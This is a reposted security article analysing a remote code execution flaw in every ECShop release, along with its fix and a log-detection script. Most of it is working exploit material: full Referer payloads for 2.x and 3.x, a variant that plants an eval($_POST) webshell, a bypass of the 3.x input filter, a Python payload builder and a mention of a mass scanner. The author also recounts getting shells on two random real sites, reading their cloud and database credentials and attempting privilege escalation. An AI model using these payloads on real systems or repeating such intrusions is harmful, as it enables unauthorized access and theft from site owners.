2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Many readers may not know how to analyse the critical remote code execution vulnerability that affects every ECShop release, or how it leads on to privilege escalation. This article summarises the cause of the problem and its fix; I hope it helps you work through it.
Vulnerability overview
In user.php, the template variable that reaches the display() function of ECShop's template engine is controlled by the client. This leads to SQL injection, and the injection can be turned into remote code execution. The attacker does not need to log in or perform any other action on the site: a webshell can be written remotely, so the impact is severe.
Vulnerability rating
Critical
Affected versions
All ECShop releases, including 2.x, 3.0.x and 3.6.x.
Vulnerability analysis
0x01. SQL injection
Start at ecshop/user.php:302. The $back_act variable is taken from HTTP_REFERER, so it is controlled by the client.
ECShop uses a PHP template engine modelled on Smarty. It has two basic functions, assign() and display(). assign() binds values to template variables, and display() renders the template. At run time the engine reads the template file, replaces the placeholders with the values bound by assign(), and produces compiled PHP that the server executes.
The template object cls_template is created in ecshop/includes/init.php:169; the class lives in includes/cls_template.php:
The assign() function, at ecshop/includes/cls_template.php:70, stores values in the template variables.
The display() function is at ecshop/includes/cls_template.php:100.
display() first calls $this->fetch() on the user_passport.dwt template; fetch() in turn calls $this->make_compiled() to compile it. make_compiled() resolves the variables in the template, including the $back_act value registered by the assign() call above, and returns to display(). At that point $out holds the HTML with the variables substituted. display() then checks whether $this->_echash occurs in $out; if it does, it splits $out on $this->_echash into $k and hands the odd-indexed segments to insert_mod() for processing.
Contents of the user_passport.dwt template file:
Now _echash, defined on line 28 of the same file: it is a fixed constant, not randomly generated (in 2.7 the value is 554fcae493e564ee0dc75bdf2ebf94ca; in 3.x it is 45ea207d7a2b68c49582d2d22adf953a). Because an attacker knows the delimiter, the $val handed to insert_mod() is controllable.
Follow insert_mod() at line 1150 of the same file. $val is passed in and split on | into $fun and $para. $para is unserialized, $fun is prefixed with insert_, and the result is called dynamically as $fun($para). The function name is partly controllable (anything after the insert_ prefix) and the argument is fully controllable. The next step is to find a usable function whose name begins with insert_; insert_ads() in ecshop/includes/lib_insert.php fits.
Finally, look at insert_ads() in the dynamic-content function library, ecshop/includes/lib_insert.php:136. $arr['id'] and $arr['num'] from the unserialized array are concatenated straight into the SQL query.
Payload:
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}554fcae493e564ee0dc75bdf2ebf94ca
The serialized array is delimited by the _echash value on both sides, so the segment handed to insert_mod() is exactly ads|a:2:{...}. The length prefixes (s:72, s:2) must equal the byte length of the strings, otherwise unserialize() fails.
The resulting database query is:
SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecsshop2`.`ecs_ad` AS a LEFT JOIN `ecsshop2`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1537322291' AND end_time >= '1537322291' AND a.position_id = '1' ORDER BY rnd LIMIT 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -
The MySQL version is returned inside the XPATH syntax error raised by extractvalue(), confirming the error-based injection.
0x02. Remote code execution
Next the program calls the template class's fetch() function, at ecshop/includes/lib_insert.php:215.
When display() is called in user.php, the argument that reaches fetch() is user_passport.dwt; here the argument is $position_style instead. Tracing it back, $position_style is assigned from $row['position_style'] at ecshop/includes/lib_insert.php:176.
position_style comes from the SQL query, and thanks to the injection above the query result is controllable, so $position_style is controllable. For the assignment $position_style = $row['position_style']; to be reached, one more condition must hold: $row['position_id'] must equal $arr['id'].
When constructing the injection, the ORDER BY rnd LIMIT part of the query cannot be truncated, so a comment is opened in id and closed in num to make a UNION query possible.
Pass '/* as id and */ union select 1,0x272f2a,3,4,5,6,7,8,9,10-- - as num. The comment swallows the ORDER BY rnd LIMIT fragment, and 0x272f2a decodes to '/*, so the position_id column of the injected row equals $arr['id'] and the equality check passes.
The database query becomes:
SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecsshop`.`ecs_ad` AS a LEFT JOIN `ecsshop`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1535678679' AND end_time >= '1535678679' AND a.position_id = ''/*' ORDER BY rnd LIMIT */ union select 1,0x272f2a,3,4,5,6,7,8,9,10-- -
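To see exactly where the two controllable fields land, here is an added Python example (not ECShop's code) that re-creates the string concatenation insert_ads() performs and strips the /* */ comment so the statement MySQL actually executes becomes visible. The table names, column order and timestamp are taken from the queries above; the helper names are my own.

```python
import re

# Column order of the insert_ads() SELECT; position_style is column 9, which is
# why the union payload puts its template string in the ninth slot.
SELECT_COLUMNS = [
    "a.ad_id", "a.position_id", "a.media_type", "a.ad_link", "a.ad_code",
    "a.ad_name", "p.ad_width", "p.ad_height", "p.position_style", "RAND() AS rnd",
]

# Re-creation of the concatenation in insert_ads(): $arr['id'] and $arr['num']
# are pasted into the string without quoting or casting (names are my own).
AD_QUERY = (
    "SELECT " + ", ".join(SELECT_COLUMNS) + " "
    "FROM `ecsshop`.`ecs_ad` AS a "
    "LEFT JOIN `ecsshop`.`ecs_ad_position` AS p ON a.position_id = p.position_id "
    "WHERE enabled = 1 AND start_time <= '{t}' AND end_time >= '{t}' "
    "AND a.position_id = '{id}' ORDER BY rnd LIMIT {num}"
)


def build_ad_query(ad_id, num, now=1535678679):
    """Return the SQL that insert_ads() would send for the given id/num values."""
    return AD_QUERY.format(t=now, id=ad_id, num=num)


def effective_sql(sql):
    """Drop /* ... */ comments and a trailing '-- ' comment to show what MySQL runs."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    return re.sub(r"--\s.*$", "", sql, flags=re.S).strip()


def position_style_column():
    """1-based index of p.position_style in the SELECT list (9)."""
    return SELECT_COLUMNS.index("p.position_style") + 1


# Constructed inputs: the error-based probe and the comment-bypass union query
# from the article (the union still carries the placeholder 9 in column 9).
PROBE_NUM = "0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -"
UNION_ID = "'/*"
UNION_NUM = "*/ union select 1,0x272f2a,3,4,5,6,7,8,9,10-- -"

if __name__ == "__main__":
    print(build_ad_query("1", PROBE_NUM))
    print(effective_sql(build_ad_query(UNION_ID, UNION_NUM)))
```

Running it prints the probe query with the stacked procedure analyse() clause, and then the union query with the comment removed, where the original ORDER BY rnd LIMIT has disappeared and a.position_id = '' is followed directly by union select.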
$position_style is then prefixed with 'str:' and passed to fetch().
Trace fetch() at ecshop/includes/cls_template.php:135.
Because of the 'str:' prefix, strncmp($filename, 'str:', 4) == 0 is true, and the dangerous $this->_eval() is called: this is where the vulnerability is finally triggered. Before that, the argument is processed by fetch_str(), at ecshop/includes/cls_template.php:281.
The first regex in fetch_str() matches a set of keywords followed by whitespace; what matters is the final return value:
    return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select('\\1');", $source);
The /e modifier makes preg_replace() evaluate the replacement as PHP, so every {...} tag in $source is handed to $this->select(). For example, if $source is xxx{$abc}xxx, group 1 is $abc and $this->select('$abc') is called.
Follow select() at line 368 of the same file.
When the first character of the tag is $, select() returns the variable wrapped in PHP tags, and that string is finally executed by the dangerous _eval(). Before returning it calls $this->get_var(); follow that to line 548.
When the variable contains neither . nor $, get_var() calls $this->make_var(); follow that to line 671.
make_var() wraps the name as $this->_var['name'], so to execute code the value must first close the [' . The payload is therefore built from the bottom up. Start with the value abc'];echo phpinfo();//. select() only hands over to get_var() when the first character is $, so it becomes $abc'];echo phpinfo();//. To reach select() it must be captured by the regex, so it becomes {$abc'];echo phpinfo();//}. Finally, phpinfo() would be matched by the first regex in fetch_str(), so the call is broken up with an empty comment: {$abc'];echo phpinfo/**/();//}. The compiled result is <?php echo $this->_var['abc'];echo phpinfo/**/();//']; ?>, which _eval() runs. The malicious PHP code is now ready.
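The regex-to-PHP step is easiest to follow in code. The following added Python example (not ECShop's code) emulates the {$var} branch of fetch_str() -> select() -> make_var() as described above and shows how a benign tag and the breakout tag compile. It also adds a strict variant of make_var() that I suggest as the check the template class lacks: it accepts only identifier-like names. Only the plain-variable branch is emulated; the . and | handling of get_var() is not modelled, and the helper names are my own.

```python
import re

# The pattern from fetch_str(): /{([^\}\{\n]*)}/e, minus the /e modifier, which
# in PHP evaluates the replacement ("\$this->select('\\1');") as code.
TAG_RE = re.compile(r"{([^}{\n]*)}")
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def make_var(val):
    """make_var() for names without '.': wrap as $this->_var['name'] verbatim."""
    if "." in val:
        raise NotImplementedError("dotted names (array access) are not emulated")
    return "$this->_var['" + val + "']"


def strict_make_var(val):
    """Suggested hardening (my own, not ECShop's fix): refuse anything that is not
    a plain identifier, so a quote or bracket can never escape the array index."""
    if not IDENT_RE.match(val):
        raise ValueError("invalid template variable name: %r" % val)
    return make_var(val)


def select(tag, var_fn=make_var):
    """select(): the '$' branch returns an echo statement; other tags pass through."""
    tag = tag.strip()
    if tag.startswith("$") and "$" not in tag[1:] and "|" not in tag:
        return "<?php echo " + var_fn(tag[1:]) + "; ?>"
    return "{" + tag + "}"


def compile_str(source, var_fn=make_var):
    """fetch_str(): rewrite every {...} tag; the result is what _eval() executes."""
    return TAG_RE.sub(lambda m: select(m.group(1), var_fn), source)


# Constructed samples: a normal template tag and the article's breakout payload.
BENIGN = '<a href="{$back_act}">back</a>'
BREAKOUT = "{$abc'];echo phpinfo/**/();//}"

if __name__ == "__main__":
    print(compile_str(BENIGN))
    print(compile_str(BREAKOUT))
    try:
        compile_str(BREAKOUT, strict_make_var)
    except ValueError as e:
        print("rejected:", e)
```

With the default make_var() the breakout tag compiles to an echo followed by an attacker-chosen statement; with strict_make_var() the same input is rejected before any PHP is generated, while the benign tag compiles identically in both modes.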
Combined with the SQL injection above, the final payload that executes the code is:
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:108:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:3:"'/*";}554fcae493e564ee0dc75bdf2ebf94ca
The hex literal in the ninth column is {$abc'];echo phpinfo/**/();//}; MySQL returns it as a string, so it reaches position_style without a single quote appearing in the SQL.
0x03. ECShop 3.x
A few words about version 3.x.
ECShop 3.x adds an includes/safety.php file that filters harmful input; its regexes match statements such as set, concat, information_schema, select from and so on. No bypass of the SQL-related patterns has been found yet, but the code execution part still works: the template payload is hex-encoded, so it never matches. The only remaining pattern that matters is union select, and because $arr['id'] and $arr['num'] are concatenated into the query separately, UNION can be placed in id and SELECT in num, so the combined keyword never appears in either field.
Reproducing the vulnerability
This reproduction uses ECShop_V2.7.3 (source package ECShop_V2.7.3_UTF8_release1106.rar, extraction code 2yk1). ECShop 2.7.3 is an old online-shop system written for PHP 5.2, while most servers now run PHP 5.3, 5.4 or later, so expect a number of compatibility problems when running it on PHP 5.3 and above. Two articles on working around these problems are recommended (links in the original post).
Results: phpinfo() output and the webshell (screenshots).
If you do not want to set up a local environment, two online vulnerable environments are available, but to understand the principle and learn more deeply it is better to set up, debug and analyse locally.
Online environment: vulnspy
Online environment: vulhub
EXP and small script
2.x
phpinfo():
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:108:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:3:"'/*";}554fcae493e564ee0dc75bdf2ebf94ca
Webshell:
The same request with the ninth column replaced by the hex encoding of {$asd'];assert(base64_decode('...'));//}, where the base64 string decodes to file_put_contents('1.php','<?php eval($_POST[1337]);?>'), and the s:N: length prefix of num updated to the new byte length.
A file 1.php is created in the web root; its password is 1337.
3.x
phpinfo():
Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:100:"*/ select 1,0x2d312720554e494f4e2f2a,3,4,5,6,7,8,0x7b24617364275d3b706870696e666f28293b2f2f7d,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
Here 0x2d312720554e494f4e2f2a is -1' UNION/* (the same string as id, so the position_id check passes) and 0x7b24617364275d3b706870696e666f28293b2f2f7d is {$asd'];phpinfo();//}.
Webshell:
As for 2.x: the ninth column carries the hex encoding of {$asd'];assert(base64_decode('...'));//}, with the base64 decoding to file_put_contents('1.php','<?php eval($_POST[1337]);?>'); id stays -1' UNION/* and the num length prefix is recomputed.
A file 1.php is created in the web root; its password is 1337.
Small script
A small PHP script was used to serialize the payload array; the ninth column of the union select is the one that ends up in position_style.
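The author's serialization script is not reproduced on this page, so as an added example (not the author's script) the Python below builds the Referer value end to end: PHP-style serialization with byte-length prefixes, the MySQL hex literal for the ninth column, and the _echash delimiters on both sides. It also re-implements the split that display() and insert_mod() perform on the server so the recovered function name and argument can be checked. The helper names are my own; the constants and payload strings are the ones given above.

```python
ECHASH_2X = "554fcae493e564ee0dc75bdf2ebf94ca"  # fixed _echash in ECShop 2.x
ECHASH_3X = "45ea207d7a2b68c49582d2d22adf953a"  # fixed _echash in ECShop 3.x


def php_serialize(value):
    """Serialize int/str/dict like PHP's serialize(). String lengths are byte
    counts, and dict order is preserved (PHP arrays are ordered)."""
    if isinstance(value, bool):
        return "b:%d;" % value
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %s" % type(value).__name__)


def mysql_hex(s):
    """Hex literal that MySQL returns as the original string, so no quotes are needed."""
    return "0x" + s.encode("utf-8").hex()


def build_referer(echash, ad_id, num):
    """insert_mod() payload: <echash>ads|<serialized array><echash>. The closing
    marker makes the odd-indexed segment end exactly at the serialized array."""
    return echash + "ads|" + php_serialize({"num": num, "id": ad_id}) + echash


def server_side_split(out, echash):
    """What display() + insert_mod() do with the rendered page: explode on _echash,
    take odd-indexed segments, split each on '|' into function suffix and argument."""
    parts = out.split(echash)
    calls = []
    for i, seg in enumerate(parts):
        if i % 2 == 1:
            fun, para = seg.split("|", 1)
            calls.append(("insert_" + fun, para))
    return calls


# Payload strings from the analysis above.
PROBE_NUM = "0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -"
TEMPLATE_2X = "{$abc'];echo phpinfo/**/();//}"
TEMPLATE_3X = "{$asd'];phpinfo();//}"


def rce_num_2x():
    """num field for 2.x: id is '/* and the hex of the template goes in column 9."""
    return ("*/ union select 1," + mysql_hex("'/*") + ",3,4,5,6,7,8,"
            + mysql_hex(TEMPLATE_2X) + ",10-- -")


def rce_num_3x():
    """num field for 3.x: 'UNION' travels in id so safety.php never sees 'union select'."""
    return ("*/ select 1," + mysql_hex("-1' UNION/*") + ",3,4,5,6,7,8,"
            + mysql_hex(TEMPLATE_3X) + ",10-- -")


if __name__ == "__main__":
    referer = build_referer(ECHASH_2X, "'/*", rce_num_2x())
    print(referer)
    # Constructed rendered page: the template echoed the Referer into an href.
    page = '<a href="' + referer + '">back</a>'
    print(server_side_split(page, ECHASH_2X))
```

Because the length prefixes are computed from the actual bytes, changing the template string (for example to the assert(base64_decode(...)) webshell form) automatically keeps the serialized array valid; the server-side split confirms that the only thing insert_mod() sees between the two markers is ads| and the array.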
Batch scanning tool
A scanner written in C# that checks specifically for the EcShop < 4.0 remote code execution vulnerability; about 10,000 sites can be checked in roughly 30 seconds.
EcShop_RCE_Scanner
Vulnerability fix
We downloaded and analysed the latest release, ECShop 4.0, to see how the vulnerability was fixed:
See ecshop4/ecshop/includes/lib_insert.php.
The incoming $arr['id'] and $arr['num'] are cast to integers, so the injected strings can no longer reach the query and the vulnerability cannot be exploited.
Note that no standalone patch has been released for the older versions (2.x and 3.x). Users of older versions can apply the same change by referring to the ECShop 4.0 code, or upgrade directly to ECShop 4.0.
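Because _echash is a fixed per-version constant and the payload must contain the literal ads| followed by a serialized PHP array, exploitation attempts are easy to spot in web server logs or at a WAF while older installs wait for the fix. The Python below is an added example (not from the article) that scans combined-format access log lines for this pattern; the log lines are constructed samples and the function names are my own.

```python
import re

# The two _echash constants quoted in the analysis, mapped to their branch.
ECHASH_VERSIONS = {
    "554fcae493e564ee0dc75bdf2ebf94ca": "2.x",
    "45ea207d7a2b68c49582d2d22adf953a": "3.x",
}

# <echash>ads|a:<n>:{  ... the start of the serialized array handed to insert_ads().
ATTACK_RE = re.compile(
    r"(?P<hash>" + "|".join(ECHASH_VERSIONS) + r")ads\|a:\d+:\{", re.I)

# Constructed Apache combined-format samples (quotes inside the Referer are
# escaped as \" by the web server). Line 1 is benign, lines 2 and 3 are attacks.
SAMPLE_LOG = r'''10.0.0.7 - - [19/Sep/2018:10:12:01 +0800] "GET /user.php?act=login HTTP/1.1" 200 5120 "http://shop.example/index.php" "Mozilla/5.0"
10.0.0.9 - - [19/Sep/2018:10:12:07 +0800] "GET /user.php HTTP/1.1" 200 6231 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:72:\"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -\";s:2:\"id\";i:1;}554fcae493e564ee0dc75bdf2ebf94ca" "python-requests/2.19.1"
10.0.0.9 - - [19/Sep/2018:10:13:44 +0800] "GET /user.php HTTP/1.1" 200 6404 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:100:\"*/ select 1,0x2d312720554e494f4e2f2a,3,4,5,6,7,8,0x7b24617364275d3b706870696e666f28293b2f2f7d,10-- -\";s:2:\"id\";s:11:\"-1' UNION/*\";}45ea207d7a2b68c49582d2d22adf953a" "python-requests/2.19.1"'''


def referer_attack_version(value):
    """Return '2.x'/'3.x' if the text carries an ECShop insert_mod payload, else None."""
    m = ATTACK_RE.search(value)
    return ECHASH_VERSIONS[m.group("hash").lower()] if m else None


def scan_access_log(text):
    """Return (line_number, client_ip, version) for every log line that carries the payload."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        version = referer_attack_version(line)
        if version:
            hits.append((lineno, line.split(" ", 1)[0], version))
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("line %d: %s -> ECShop %s payload" % hit)
```

referer_attack_version() can be applied to the raw Referer header at a reverse proxy as a blocking rule as well; the marker never appears in a legitimate Referer, so the false-positive risk is negligible.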
Real-world test and privilege escalation
I picked a 2.7.3 site and a 3.0.0 site at random; the exploit gets a shell on both directly, exactly as on the local build.
Recently a teacher told me that the highest form of security is actually social engineering. When I got into the database I saw the encrypted password, and even after working out the hashing scheme I could not recover the admin password for a long time; my roommate guessed it on the spot in a few minutes. So the best trick is to guess the password outright and skip all the fancy work.
There is a new site:
And there is an old site:
The new site was vulnerable as soon as it went up, while the old site is still being updated, which is a little amusing.
Very important material, such as the Aliyun account password and the database credentials, was written down in a slightly hidden place, and I came across it anyway.
And almost all of the passwords are weak, which is food for thought.
On privilege escalation
Ha, I have not found a way yet. I am a beginner at privilege escalation and would welcome pointers from anyone more experienced; I will update this part once I succeed.
Commands cannot be executed, but I have read and write access.